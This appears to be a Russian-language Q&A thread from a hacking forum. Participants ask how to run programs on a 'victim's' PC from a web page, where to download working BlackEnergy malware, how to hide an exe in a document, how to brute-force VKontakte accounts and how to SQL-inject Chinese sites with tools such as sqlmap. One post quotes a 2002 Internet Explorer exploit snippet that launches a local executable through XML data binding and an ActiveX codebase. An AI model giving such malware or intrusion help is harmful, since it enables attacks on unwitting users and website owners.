Сообщений в теме: 16

[aka PSIH]

Задавайте здесь ваши вопросы.

P.S: Не рекомендуется задавать вопросы, ответы на которые можно легко найти в поиске ;)

[oler117]

Как обойти проверку сертификата ActiveX при загрузке страницы? Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...

Цитата

Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров:
Код
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security><exploit><![CDATA[            
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"  codebase="c:/WINDOWS/calc.exe"></object>            
]]></exploit></security>
</xml>
Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним).

Этот вопрос я задавал 2 разаи мне никто не ответил!

[aka PSIH]

Цитата

Как обойти проверку сертификата ActiveX при загрузке страницы?

Не как ты не обойдешь эту проверку, надо было сначала почитать что такое ActiveX и зачем им сертификаты, сразу бы все понятно стало

Цитата

Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...

Ты чего добиться то хочешь? Exe на компе жертвы запустить? Дак ищи паблик сплойты под браузеры их щас в инете навалом тока пробив у них ху**** ))

[oler117]

Ok... Все, я уже не хочу обходить сертификаты... Вопрос№2: как сделать, что-бы ActiveX, сделаный мною, запустился у того, кто откроет веб-страницу?

[I-Like-It]

Где скачать любую рабочую версию Black Energy?
Качала несколько раз - все попадается с браком или, уж не знаю, -с "защитой от дураков", но факт, что не работает. Кто-нибудь может дать работоспособную версию?

[SpeedTor]

Прошу подсказать дорген,  в котором  можно былобы получить читаемый   текст, пусть   пожертвовав кейвордами. Т.е.    грабит> синомизирует >перемешует абзаци>заливает

[$iD]

SpeedTor
Тут задаются вопросы по хакингу, а не по доргенам!

[sergnarov]

а где скачать прогу exe в doc ?

[liv]

Помогите ссылкой скачать любую рабочую версию Black Energy

[*КРОТ#]

доброго времени суток колегам по цеху.
такой вопрос:есть ли брут для подбора пасов на лов планет???

[$iD]

*КРОТ#
авторегер и спамер есть, брута не видел.

[*КРОТ#]

спс.чёнибуть из предложеного попробую.

[Vurlakk]

ВКонтакте поддерживает протокол XMPP. Вот такие нубские вопросы:
Акк ВКотнакте можно сбрутить через XMPP?
Можно спамить и флудить сколько угодно?
Без прокси, капч и т.п. гемора?
Или всё не так просто?

[Fin]

сейчас все не так просто, при множественном числе неправильных паролей может выскочить смс. блокируют акки и т.д. включая блок по ИП.

[Mikrob]

Можно ли найти украденный ноутбук?
Ноут украден на территории дачного поселка. Рядом только один интернет провайдер (кроме мобильных, но врятли воры ими воспользуются)
Ментам судя по всему наплевать. Продавать (или в скупку) тоже врятли станут, во первых ноут приметный (да и не из дешевых), во вторых в поселке все знают о "пропаже", а в райцентре у меня много знакомых, в т.ч. и в магазинах, ремонтных мастерских и даже в ломбардах, а в другой город думаю тоже врятли попрут (хотя конечно бывает все).
Есть хоть какие то шансы?
P.S.
Думаю продавать нестанут, а вот пользоваться втихую вероятней всего будут

[$iD]

Не буду ходить вокруг да около - Шансов нет.

Максимум можно отыскать по мак адресу, но я сомневаюсь что вы его знаете.

[loren4]

Привет всем !

Ребята помогите разобраться в такой фишке со взломом китайских сайтов: часто найду уязвимые китайские сайты, как начинаю процесс взлома с havij,sqldumper,webcruiser,sqlmap и тп всегда одно и то же проблема, програмы найдут что уязвимость например Integer, кейворд вот такой то, но не может найти базу, всегда эта проблема,, я думаю тут проблема в китайских буквах наверное что программы не могут читать имя базы данных.

Кто что может советовать, помочь разобраться.
Заранее спасибо)